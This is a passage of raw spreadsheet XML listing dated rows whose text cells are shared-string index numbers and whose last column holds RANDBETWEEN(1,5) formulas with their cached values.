        <v>3</v>
      </c>
    </row>
    <row r="6728" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6728" s="1">
        <v>43430.353784722225</v>
      </c>
      <c r="C6728" t="s">
        <v>6</v>
      </c>
      <c r="D6728" t="s">
        <v>25</v>
      </c>
      <c r="E6728" t="s">
        <v>5989</v>
      </c>
      <c r="F6728">
        <f t="shared" ca="1" si="105"/>
        <v>3</v>
      </c>
    </row>
    <row r="6729" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6729" s="1">
        <v>43430.333668981482</v>
      </c>
      <c r="C6729" t="s">
        <v>686</v>
      </c>
      <c r="E6729" t="s">
        <v>5990</v>
      </c>
      <c r="F6729">
        <f t="shared" ca="1" si="105"/>
        <v>2</v>
      </c>
    </row>
    <row r="6730" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6730" s="1">
        <v>43430.329004629632</v>
      </c>
      <c r="C6730" t="s">
        <v>103</v>
      </c>
      <c r="E6730" t="s">
        <v>5991</v>
      </c>
      <c r="F6730">
        <f t="shared" ca="1" si="105"/>
        <v>3</v>
      </c>
    </row>
    <row r="6731" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6731" s="1">
        <v>43430.321435185186</v>
      </c>
      <c r="C6731" t="s">
        <v>430</v>
      </c>
      <c r="E6731" t="s">
        <v>5992</v>
      </c>
      <c r="F6731">
        <f t="shared" ca="1" si="105"/>
        <v>3</v>
      </c>
    </row>
    <row r="6732" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6732" s="1">
        <v>43430.286192129628</v>
      </c>
      <c r="C6732" t="s">
        <v>124</v>
      </c>
      <c r="E6732" s="2" t="s">
        <v>5993</v>
      </c>
      <c r="F6732">
        <f t="shared" ca="1" si="105"/>
        <v>3</v>
      </c>
    </row>
    <row r="6733" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6733" s="1">
        <v>43430.281412037039</v>
      </c>
      <c r="C6733" t="s">
        <v>173</v>
      </c>
      <c r="E6733" s="2" t="s">
        <v>5994</v>
      </c>
      <c r="F6733">
        <f t="shared" ca="1" si="105"/>
        <v>4</v>
      </c>
    </row>
    <row r="6734" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6734" s="1">
        <v>43430.281412037039</v>
      </c>
      <c r="C6734" t="s">
        <v>173</v>
      </c>
      <c r="E6734" s="2" t="s">
        <v>5994</v>
      </c>
      <c r="F6734">
        <f t="shared" ca="1" si="105"/>
        <v>5</v>
      </c>
    </row>
    <row r="6735" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A6735" s="1">
        <v>43430.273993055554</v>
      </c>
      <c r="C6735" t="s">
        <v>559</v>
      </c>
      <c r="E6735" s="2" t="s">
        <v>5995</v>
      </c>
      <c r="F6735">
        <f t="shared" ca="1" si="105"/>
        <v>3</v>
      </c>
    </row>
    <row r="6736" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6736" s="1">
        <v>43430.249421296299</v>
      </c>
      <c r="C6736" t="s">
        <v>10</v>
      </c>
      <c r="D6736" t="s">
        <v>92</v>
      </c>
      <c r="E6736" s="2" t="s">
        <v>5996</v>
      </c>
      <c r="F6736">
        <f t="shared" ca="1" si="105"/>
        <v>2</v>
      </c>
    </row>
    <row r="6737" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6737" s="1">
        <v>43430.239861111113</v>
      </c>
      <c r="C6737" t="s">
        <v>41</v>
      </c>
      <c r="E6737" t="s">
        <v>5997</v>
      </c>
      <c r="F6737">
        <f t="shared" ca="1" si="105"/>
        <v>1</v>
      </c>
    </row>
    <row r="6738" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A6738" s="1">
        <v>43430.237916666665</v>
      </c>
      <c r="C6738" t="s">
        <v>41</v>
      </c>
      <c r="E6738" s="2" t="s">
        <v>5998</v>
      </c>
      <c r="F6738">
        <f t="shared" ca="1" si="105"/>
        <v>4</v>
      </c>
    </row>
    <row r="6739" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6739" s="1">
        <v>43430.235567129632</v>
      </c>
      <c r="C6739" t="s">
        <v>173</v>
      </c>
      <c r="E6739" t="s">
        <v>5999</v>
      </c>
      <c r="F6739">
        <f t="shared" ca="1" si="105"/>
        <v>3</v>
      </c>
    </row>
    <row r="6740" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A6740" s="1">
        <v>43430.213171296295</v>
      </c>
      <c r="C6740" t="s">
        <v>865</v>
      </c>
      <c r="E6740" s="2" t="s">
        <v>6000</v>
      </c>
      <c r="F6740">
        <f t="shared" ca="1" si="105"/>
        <v>4</v>
      </c>
    </row>
    <row r="6741" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A6741" s="1">
        <v>43430.169074074074</v>
      </c>
      <c r="C6741" t="s">
        <v>71</v>
      </c>
      <c r="E6741" s="2" t="s">
        <v>6001</v>
      </c>
      <c r="F6741">
        <f t="shared" ca="1" si="105"/>
        <v>3</v>
      </c>
    </row>
    <row r="6742" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6742" s="1">
        <v>43430.142870370371</v>
      </c>
      <c r="C6742" t="s">
        <v>253</v>
      </c>
      <c r="E6742" s="2" t="s">
        <v>6002</v>
      </c>
      <c r="F6742">
        <f t="shared" ca="1" si="105"/>
        <v>1</v>
      </c>
    </row>
    <row r="6743" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6743" s="1">
        <v>43430.141458333332</v>
      </c>
      <c r="C6743" t="s">
        <v>41</v>
      </c>
      <c r="E6743" t="s">
        <v>6003</v>
      </c>
      <c r="F6743">
        <f t="shared" ca="1" si="105"/>
        <v>3</v>
      </c>
    </row>
    <row r="6744" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6744" s="1">
        <v>43430.118287037039</v>
      </c>
      <c r="C6744" t="s">
        <v>471</v>
      </c>
      <c r="D6744" t="s">
        <v>312</v>
      </c>
      <c r="E6744" t="s">
        <v>6004</v>
      </c>
      <c r="F6744">
        <f t="shared" ca="1" si="105"/>
        <v>5</v>
      </c>
    </row>
    <row r="6745" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6745" s="1">
        <v>43430.109444444446</v>
      </c>
      <c r="C6745" t="s">
        <v>314</v>
      </c>
      <c r="E6745" t="s">
        <v>6005</v>
      </c>
      <c r="F6745">
        <f t="shared" ca="1" si="105"/>
        <v>5</v>
      </c>
    </row>
    <row r="6746" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A6746" s="1">
        <v>43430.075960648152</v>
      </c>
      <c r="C6746" t="s">
        <v>253</v>
      </c>
      <c r="E6746" s="2" t="s">
        <v>6006</v>
      </c>
      <c r="F6746">
        <f t="shared" ca="1" si="105"/>
        <v>3</v>
      </c>
    </row>
    <row r="6747" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6747" s="1">
        <v>43430.04310185185</v>
      </c>
      <c r="C6747" t="s">
        <v>563</v>
      </c>
      <c r="D6747" t="s">
        <v>312</v>
      </c>
      <c r="E6747" s="2" t="s">
        <v>6007</v>
      </c>
      <c r="F6747">
        <f t="shared" ca="1" si="105"/>
        <v>2</v>
      </c>
    </row>
    <row r="6748" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6748" s="1">
        <v>43429.93954861111</v>
      </c>
      <c r="C6748" t="s">
        <v>139</v>
      </c>
      <c r="E6748" t="s">
        <v>6008</v>
      </c>
      <c r="F6748">
        <f t="shared" ca="1" si="105"/>
        <v>2</v>
      </c>
    </row>
    <row r="6749" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6749" s="1">
        <v>43429.851261574076</v>
      </c>
      <c r="C6749" t="s">
        <v>253</v>
      </c>
      <c r="E6749" t="s">
        <v>6009</v>
      </c>
      <c r="F6749">
        <f t="shared" ca="1" si="105"/>
        <v>1</v>
      </c>
    </row>
    <row r="6750" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6750" s="1">
        <v>43429.776250000003</v>
      </c>
      <c r="C6750" t="s">
        <v>10</v>
      </c>
      <c r="D6750" t="s">
        <v>89</v>
      </c>
      <c r="E6750" s="2" t="s">
        <v>6010</v>
      </c>
      <c r="F6750">
        <f t="shared" ca="1" si="105"/>
        <v>3</v>
      </c>
    </row>
    <row r="6751" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6751" s="1">
        <v>43429.731585648151</v>
      </c>
      <c r="C6751" t="s">
        <v>140</v>
      </c>
      <c r="D6751" t="s">
        <v>847</v>
      </c>
      <c r="E6751" t="s">
        <v>6011</v>
      </c>
      <c r="F6751">
        <f t="shared" ca="1" si="105"/>
        <v>1</v>
      </c>
    </row>
    <row r="6752" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6752" s="1">
        <v>43429.584502314814</v>
      </c>
      <c r="C6752" t="s">
        <v>197</v>
      </c>
      <c r="D6752" t="s">
        <v>114</v>
      </c>
      <c r="E6752" t="s">
        <v>5785</v>
      </c>
      <c r="F6752">
        <f t="shared" ca="1" si="105"/>
        <v>5</v>
      </c>
    </row>
    <row r="6753" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6753" s="1">
        <v>43429.583657407406</v>
      </c>
      <c r="C6753" t="s">
        <v>41</v>
      </c>
      <c r="E6753" t="s">
        <v>6012</v>
      </c>
      <c r="F6753">
        <f t="shared" ca="1" si="105"/>
        <v>3</v>
      </c>
    </row>
    <row r="6754" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6754" s="1">
        <v>43429.474166666667</v>
      </c>
      <c r="C6754" t="s">
        <v>10</v>
      </c>
      <c r="D6754" t="s">
        <v>6</v>
      </c>
      <c r="E6754" t="s">
        <v>6013</v>
      </c>
      <c r="F6754">
        <f t="shared" ca="1" si="105"/>
        <v>4</v>
      </c>
    </row>
    <row r="6755" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6755" s="1">
        <v>43429.45685185185</v>
      </c>
      <c r="C6755" t="s">
        <v>71</v>
      </c>
      <c r="E6755" s="2" t="s">
        <v>6014</v>
      </c>
      <c r="F6755">
        <f t="shared" ca="1" si="105"/>
        <v>1</v>
      </c>
    </row>
    <row r="6756" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6756" s="1">
        <v>43429.407592592594</v>
      </c>
      <c r="C6756" t="s">
        <v>408</v>
      </c>
      <c r="E6756" t="s">
        <v>6015</v>
      </c>
      <c r="F6756">
        <f t="shared" ca="1" si="105"/>
        <v>4</v>
      </c>
    </row>
    <row r="6757" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A6757" s="1">
        <v>43429.356157407405</v>
      </c>
      <c r="C6757" t="s">
        <v>712</v>
      </c>
      <c r="D6757" t="s">
        <v>2214</v>
      </c>
      <c r="E6757" s="2" t="s">
        <v>6016</v>
      </c>
      <c r="F6757">
        <f t="shared" ca="1" si="105"/>
        <v>4</v>
      </c>
    </row>
    <row r="6758" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6758" s="1">
        <v>43429.080694444441</v>
      </c>
      <c r="C6758" t="s">
        <v>10</v>
      </c>
      <c r="D6758" t="s">
        <v>36</v>
      </c>
      <c r="E6758" t="s">
        <v>6017</v>
      </c>
      <c r="F6758">
        <f t="shared" ca="1" si="105"/>
        <v>2</v>
      </c>
    </row>
    <row r="6759" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A6759" s="1">
        <v>43429.028032407405</v>
      </c>
      <c r="C6759" t="s">
        <v>2428</v>
      </c>
      <c r="D6759" t="s">
        <v>229</v>
      </c>
      <c r="E6759" s="2" t="s">
        <v>6016</v>
      </c>
      <c r="F6759">
        <f t="shared" ca="1" si="105"/>
        <v>3</v>
      </c>
    </row>
    <row r="6760" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6760" s="1">
        <v>43428.814756944441</v>
      </c>
      <c r="C6760" t="s">
        <v>10</v>
      </c>
      <c r="D6760" t="s">
        <v>6</v>
      </c>
      <c r="E6760" s="2" t="s">
        <v>6018</v>
      </c>
      <c r="F6760">
        <f t="shared" ca="1" si="105"/>
        <v>4</v>
      </c>
    </row>
    <row r="6761" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6761" s="1">
        <v>43428.257696759261</v>
      </c>
      <c r="C6761" t="s">
        <v>10</v>
      </c>
      <c r="D6761" t="s">
        <v>89</v>
      </c>
      <c r="F6761">
        <f t="shared" ca="1" si="105"/>
        <v>2</v>
      </c>
    </row>
    <row r="6762" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6762" s="1">
        <v>43428.124074074076</v>
      </c>
      <c r="C6762" t="s">
        <v>6019</v>
      </c>
      <c r="D6762" t="s">
        <v>1993</v>
      </c>
      <c r="E6762" t="s">
        <v>5956</v>
      </c>
      <c r="F6762">
        <f t="shared" ca="1" si="105"/>
        <v>5</v>
      </c>
    </row>
    <row r="6763" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A6763" s="1">
        <v>43428.120428240742</v>
      </c>
      <c r="C6763" t="s">
        <v>408</v>
      </c>
      <c r="E6763" s="2" t="s">
        <v>6020</v>
      </c>
      <c r="F6763">
        <f t="shared" ca="1" si="105"/>
        <v>4</v>
      </c>
    </row>
    <row r="6764" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6764" s="1">
        <v>43427.978310185186</v>
      </c>
      <c r="C6764" t="s">
        <v>10</v>
      </c>
      <c r="D6764" t="s">
        <v>52</v>
      </c>
      <c r="E6764" s="2" t="s">
        <v>6021</v>
      </c>
      <c r="F6764">
        <f t="shared" ca="1" si="105"/>
        <v>2</v>
      </c>
    </row>
    <row r="6765" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6765" s="1">
        <v>43427.859722222223</v>
      </c>
      <c r="C6765" t="s">
        <v>10</v>
      </c>
      <c r="D6765" t="s">
        <v>52</v>
      </c>
      <c r="F6765">
        <f t="shared" ca="1" si="105"/>
        <v>1</v>
      </c>
    </row>
    <row r="6766" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6766" s="1">
        <v>43427.859710648147</v>
      </c>
      <c r="C6766" t="s">
        <v>10</v>
      </c>
      <c r="D6766" t="s">
        <v>52</v>
      </c>
      <c r="F6766">
        <f t="shared" ca="1" si="105"/>
        <v>3</v>
      </c>
    </row>
    <row r="6767" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6767" s="1">
        <v>43427.859652777777</v>
      </c>
      <c r="C6767" t="s">
        <v>10</v>
      </c>
      <c r="D6767" t="s">
        <v>52</v>
      </c>
      <c r="F6767">
        <f t="shared" ca="1" si="105"/>
        <v>4</v>
      </c>
    </row>
    <row r="6768" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6768" s="1">
        <v>43427.792650462965</v>
      </c>
      <c r="C6768" t="s">
        <v>6</v>
      </c>
      <c r="D6768" t="s">
        <v>114</v>
      </c>
      <c r="E6768" t="s">
        <v>6022</v>
      </c>
      <c r="F6768">
        <f t="shared" ca="1" si="105"/>
        <v>5</v>
      </c>
    </row>
    <row r="6769" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6769" s="1">
        <v>43427.787418981483</v>
      </c>
      <c r="C6769" t="s">
        <v>4278</v>
      </c>
      <c r="D6769" t="s">
        <v>6</v>
      </c>
      <c r="E6769" t="s">
        <v>4070</v>
      </c>
      <c r="F6769">
        <f t="shared" ca="1" si="105"/>
        <v>4</v>
      </c>
    </row>
    <row r="6770" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6770" s="1">
        <v>43427.683576388888</v>
      </c>
      <c r="C6770" t="s">
        <v>10</v>
      </c>
      <c r="D6770" t="s">
        <v>17</v>
      </c>
      <c r="E6770" s="2" t="s">
        <v>6023</v>
      </c>
      <c r="F6770">
        <f t="shared" ca="1" si="105"/>
        <v>5</v>
      </c>
    </row>
    <row r="6771" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6771" s="1">
        <v>43427.65284722222</v>
      </c>
      <c r="C6771" t="s">
        <v>69</v>
      </c>
      <c r="D6771" t="s">
        <v>178</v>
      </c>
      <c r="E6771" t="s">
        <v>6024</v>
      </c>
      <c r="F6771">
        <f t="shared" ca="1" si="105"/>
        <v>1</v>
      </c>
    </row>
    <row r="6772" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A6772" s="1">
        <v>43427.598414351851</v>
      </c>
      <c r="C6772" t="s">
        <v>6</v>
      </c>
      <c r="D6772" t="s">
        <v>25</v>
      </c>
      <c r="E6772" s="2" t="s">
        <v>6025</v>
      </c>
      <c r="F6772">
        <f t="shared" ca="1" si="105"/>
        <v>5</v>
      </c>
    </row>
    <row r="6773" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6773" s="1">
        <v>43427.570925925924</v>
      </c>
      <c r="C6773" t="s">
        <v>10</v>
      </c>
      <c r="D6773" t="s">
        <v>11</v>
      </c>
      <c r="E6773" t="s">
        <v>6026</v>
      </c>
      <c r="F6773">
        <f t="shared" ca="1" si="105"/>
        <v>5</v>
      </c>
    </row>
    <row r="6774" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6774" s="1">
        <v>43427.542627314811</v>
      </c>
      <c r="C6774" t="s">
        <v>65</v>
      </c>
      <c r="E6774" s="2" t="s">
        <v>6027</v>
      </c>
      <c r="F6774">
        <f t="shared" ca="1" si="105"/>
        <v>1</v>
      </c>
    </row>
    <row r="6775" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6775" s="1">
        <v>43427.540486111109</v>
      </c>
      <c r="C6775" t="s">
        <v>2986</v>
      </c>
      <c r="D6775" t="s">
        <v>52</v>
      </c>
      <c r="E6775" t="s">
        <v>6028</v>
      </c>
      <c r="F6775">
        <f t="shared" ca="1" si="105"/>
        <v>3</v>
      </c>
    </row>
    <row r="6776" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6776" s="1">
        <v>43427.535567129627</v>
      </c>
      <c r="C6776" t="s">
        <v>60</v>
      </c>
      <c r="F6776">
        <f t="shared" ca="1" si="105"/>
        <v>5</v>
      </c>
    </row>
    <row r="6777" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6777" s="1">
        <v>43427.530324074076</v>
      </c>
      <c r="C6777" t="s">
        <v>301</v>
      </c>
      <c r="E6777" t="s">
        <v>6029</v>
      </c>
      <c r="F6777">
        <f t="shared" ca="1" si="105"/>
        <v>5</v>
      </c>
    </row>
    <row r="6778" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6778" s="1">
        <v>43427.51803240741</v>
      </c>
      <c r="C6778" t="s">
        <v>163</v>
      </c>
      <c r="E6778" t="s">
        <v>6030</v>
      </c>
      <c r="F6778">
        <f t="shared" ca="1" si="105"/>
        <v>4</v>
      </c>
    </row>
    <row r="6779" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6779" s="1">
        <v>43427.499710648146</v>
      </c>
      <c r="C6779" t="s">
        <v>6</v>
      </c>
      <c r="D6779" t="s">
        <v>25</v>
      </c>
      <c r="E6779" s="2" t="s">
        <v>6031</v>
      </c>
      <c r="F6779">
        <f t="shared" ca="1" si="105"/>
        <v>1</v>
      </c>
    </row>
    <row r="6780" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6780" s="1">
        <v>43427.480624999997</v>
      </c>
      <c r="C6780" t="s">
        <v>10</v>
      </c>
      <c r="D6780" t="s">
        <v>56</v>
      </c>
      <c r="E6780" t="s">
        <v>6032</v>
      </c>
      <c r="F6780">
        <f t="shared" ca="1" si="105"/>
        <v>2</v>
      </c>
    </row>
    <row r="6781" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6781" s="1">
        <v>43427.478425925925</v>
      </c>
      <c r="C6781" t="s">
        <v>41</v>
      </c>
      <c r="E6781" s="2" t="s">
        <v>6033</v>
      </c>
      <c r="F6781">
        <f t="shared" ca="1" si="105"/>
        <v>2</v>
      </c>
    </row>
    <row r="6782" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A6782" s="1">
        <v>43427.466932870368</v>
      </c>
      <c r="C6782" t="s">
        <v>253</v>
      </c>
      <c r="E6782" s="2" t="s">
        <v>6034</v>
      </c>
      <c r="F6782">
        <f t="shared" ca="1" si="105"/>
        <v>3</v>
      </c>
    </row>
    <row r="6783" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6783" s="1">
        <v>43427.45590277778</v>
      </c>
      <c r="C6783" t="s">
        <v>173</v>
      </c>
      <c r="E6783" s="2" t="s">
        <v>6035</v>
      </c>
      <c r="F6783">
        <f t="shared" ca="1" si="105"/>
        <v>2</v>
      </c>
    </row>
    <row r="6784" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6784" s="1">
        <v>43427.436331018522</v>
      </c>
      <c r="C6784" t="s">
        <v>48</v>
      </c>
      <c r="E6784" t="s">
        <v>6036</v>
      </c>
      <c r="F6784">
        <f t="shared" ca="1" si="105"/>
        <v>5</v>
      </c>
    </row>
    <row r="6785" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6785" s="1">
        <v>43427.430983796294</v>
      </c>
      <c r="C6785" t="s">
        <v>60</v>
      </c>
      <c r="F6785">
        <f t="shared" ca="1" si="105"/>
        <v>5</v>
      </c>
    </row>
    <row r="6786" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6786" s="1">
        <v>43427.430972222224</v>
      </c>
      <c r="C6786" t="s">
        <v>60</v>
      </c>
      <c r="F6786">
        <f t="shared" ref="F6786:F6849" ca="1" si="106">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="6787" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6787" s="1">
        <v>43427.430949074071</v>
      </c>
      <c r="C6787" t="s">
        <v>60</v>
      </c>
      <c r="F6787">
        <f t="shared" ca="1" si="106"/>
        <v>2</v>
      </c>
    </row>
    <row r="6788" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6788" s="1">
        <v>43427.430335648147</v>
      </c>
      <c r="C6788" t="s">
        <v>60</v>
      </c>
      <c r="F6788">
        <f t="shared" ca="1" si="106"/>
        <v>1</v>
      </c>
    </row>
    <row r="6789" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6789" s="1">
        <v>43427.429861111108</v>
      </c>
      <c r="C6789" t="s">
        <v>60</v>
      </c>
      <c r="E6789" t="s">
        <v>6037</v>
      </c>
      <c r="F6789">
        <f t="shared" ca="1" si="106"/>
        <v>3</v>
      </c>
    </row>
    <row r="6790" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6790" s="1">
        <v>43427.410300925927</v>
      </c>
      <c r="C6790" t="s">
        <v>559</v>
      </c>
      <c r="E6790" s="2" t="s">
        <v>6038</v>
      </c>
      <c r="F6790">
        <f t="shared" ca="1" si="106"/>
        <v>5</v>
      </c>
    </row>
    <row r="6791" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6791" s="1">
        <v>43427.386273148149</v>
      </c>
      <c r="C6791" t="s">
        <v>10</v>
      </c>
      <c r="D6791" t="s">
        <v>263</v>
      </c>
      <c r="E6791" t="s">
        <v>6039</v>
      </c>
      <c r="F6791">
        <f t="shared" ca="1" si="106"/>
        <v>3</v>
      </c>
    </row>
    <row r="6792" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6792" s="1">
        <v>43427.371145833335</v>
      </c>
      <c r="C6792" t="s">
        <v>6</v>
      </c>
      <c r="D6792" t="s">
        <v>25</v>
      </c>
      <c r="E6792" s="2" t="s">
        <v>6040</v>
      </c>
      <c r="F6792">
        <f t="shared" ca="1" si="106"/>
        <v>5</v>
      </c>
    </row>
    <row r="6793" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6793" s="1">
        <v>43427.362488425926</v>
      </c>
      <c r="C6793" t="s">
        <v>71</v>
      </c>
      <c r="E6793" t="s">
        <v>6041</v>
      </c>
      <c r="F6793">
        <f t="shared" ca="1" si="106"/>
        <v>4</v>
      </c>
    </row>
    <row r="6794" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6794" s="1">
        <v>43427.33766203704</v>
      </c>
      <c r="C6794" t="s">
        <v>280</v>
      </c>
      <c r="E6794" t="s">
        <v>6042</v>
      </c>
      <c r="F6794">
        <f t="shared" ca="1" si="106"/>
        <v>4</v>
      </c>
    </row>
    <row r="6795" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A6795" s="1">
        <v>43427.330925925926</v>
      </c>
      <c r="C6795" t="s">
        <v>6</v>
      </c>
      <c r="D6795" t="s">
        <v>25</v>
      </c>
      <c r="E6795" s="2" t="s">
        <v>6043</v>
      </c>
      <c r="F6795">
        <f t="shared" ca="1" si="106"/>
        <v>4</v>
      </c>
    </row>
    <row r="6796" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6796" s="1">
        <v>43427.321817129632</v>
      </c>
      <c r="C6796" t="s">
        <v>535</v>
      </c>
      <c r="E6796" t="s">
        <v>6044</v>
      </c>
      <c r="F6796">
        <f t="shared" ca="1" si="106"/>
        <v>1</v>
      </c>
    </row>
    <row r="6797" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6797" s="1">
        <v>43427.260266203702</v>
      </c>
      <c r="C6797" t="s">
        <v>10</v>
      </c>
      <c r="D6797" t="s">
        <v>6</v>
      </c>
      <c r="F6797">
        <f t="shared" ca="1" si="106"/>
        <v>2</v>
      </c>
    </row>
    <row r="6798" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6798" s="1">
        <v>43427.243634259263</v>
      </c>
      <c r="C6798" t="s">
        <v>48</v>
      </c>
      <c r="E6798" t="s">
        <v>6045</v>
      </c>
      <c r="F6798">
        <f t="shared" ca="1" si="106"/>
        <v>2</v>
      </c>
    </row>
    <row r="6799" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6799" s="1">
        <v>43427.222662037035</v>
      </c>
      <c r="C6799" t="s">
        <v>189</v>
      </c>
      <c r="E6799" t="s">
        <v>6046</v>
      </c>
      <c r="F6799">
        <f t="shared" ca="1" si="106"/>
        <v>5</v>
      </c>
    </row>
    <row r="6800" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6800" s="1">
        <v>43427.194537037038</v>
      </c>
      <c r="C6800" t="s">
        <v>3443</v>
      </c>
      <c r="E6800" s="2" t="s">
        <v>6047</v>
      </c>
      <c r="F6800">
        <f t="shared" ca="1" si="106"/>
        <v>3</v>
      </c>
    </row>
    <row r="6801" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6801" s="1">
        <v>43427.158136574071</v>
      </c>
      <c r="C6801" t="s">
        <v>2986</v>
      </c>
      <c r="D6801" t="s">
        <v>2139</v>
      </c>
      <c r="E6801" t="s">
        <v>6028</v>
      </c>
      <c r="F6801">
        <f t="shared" ca="1" si="106"/>
        <v>2</v>
      </c>
    </row>
    <row r="6802" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6802" s="1">
        <v>43427.148113425923</v>
      </c>
      <c r="C6802" t="s">
        <v>48</v>
      </c>
      <c r="E6802" t="s">
        <v>6048</v>
      </c>
      <c r="F6802">
        <f t="shared" ca="1" si="106"/>
        <v>2</v>
      </c>
    </row>
    <row r="6803" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6803" s="1">
        <v>43427.034108796295</v>
      </c>
      <c r="C6803" t="s">
        <v>41</v>
      </c>
      <c r="E6803" t="s">
        <v>6049</v>
      </c>
      <c r="F6803">
        <f t="shared" ca="1" si="106"/>
        <v>3</v>
      </c>
    </row>
    <row r="6804" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A6804" s="1">
        <v>43427.015648148146</v>
      </c>
      <c r="C6804" t="s">
        <v>140</v>
      </c>
      <c r="D6804" t="s">
        <v>197</v>
      </c>
      <c r="E6804" s="2" t="s">
        <v>6050</v>
      </c>
      <c r="F6804">
        <f t="shared" ca="1" si="106"/>
        <v>4</v>
      </c>
    </row>
    <row r="6805" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6805" s="1">
        <v>43426.994687500002</v>
      </c>
      <c r="C6805" t="s">
        <v>71</v>
      </c>
      <c r="E6805" t="s">
        <v>6051</v>
      </c>
      <c r="F6805">
        <f t="shared" ca="1" si="106"/>
        <v>2</v>
      </c>
    </row>
    <row r="6806" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6806" s="1">
        <v>43426.919131944444</v>
      </c>
      <c r="C6806" t="s">
        <v>253</v>
      </c>
      <c r="E6806" t="s">
        <v>6052</v>
      </c>
      <c r="F6806">
        <f t="shared" ca="1" si="106"/>
        <v>4</v>
      </c>
    </row>
    <row r="6807" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6807" s="1">
        <v>43426.845439814817</v>
      </c>
      <c r="C6807" t="s">
        <v>140</v>
      </c>
      <c r="D6807" t="s">
        <v>234</v>
      </c>
      <c r="E6807" t="s">
        <v>6053</v>
      </c>
      <c r="F6807">
        <f t="shared" ca="1" si="106"/>
        <v>5</v>
      </c>
    </row>
    <row r="6808" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6808" s="1">
        <v>43426.834467592591</v>
      </c>
      <c r="C6808" t="s">
        <v>71</v>
      </c>
      <c r="F6808">
        <f t="shared" ca="1" si="106"/>
        <v>4</v>
      </c>
    </row>
    <row r="6809" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6809" s="1">
        <v>43426.690405092595</v>
      </c>
      <c r="C6809" t="s">
        <v>2986</v>
      </c>
      <c r="D6809" t="s">
        <v>36</v>
      </c>
      <c r="E6809" t="s">
        <v>6028</v>
      </c>
      <c r="F6809">
        <f t="shared" ca="1" si="106"/>
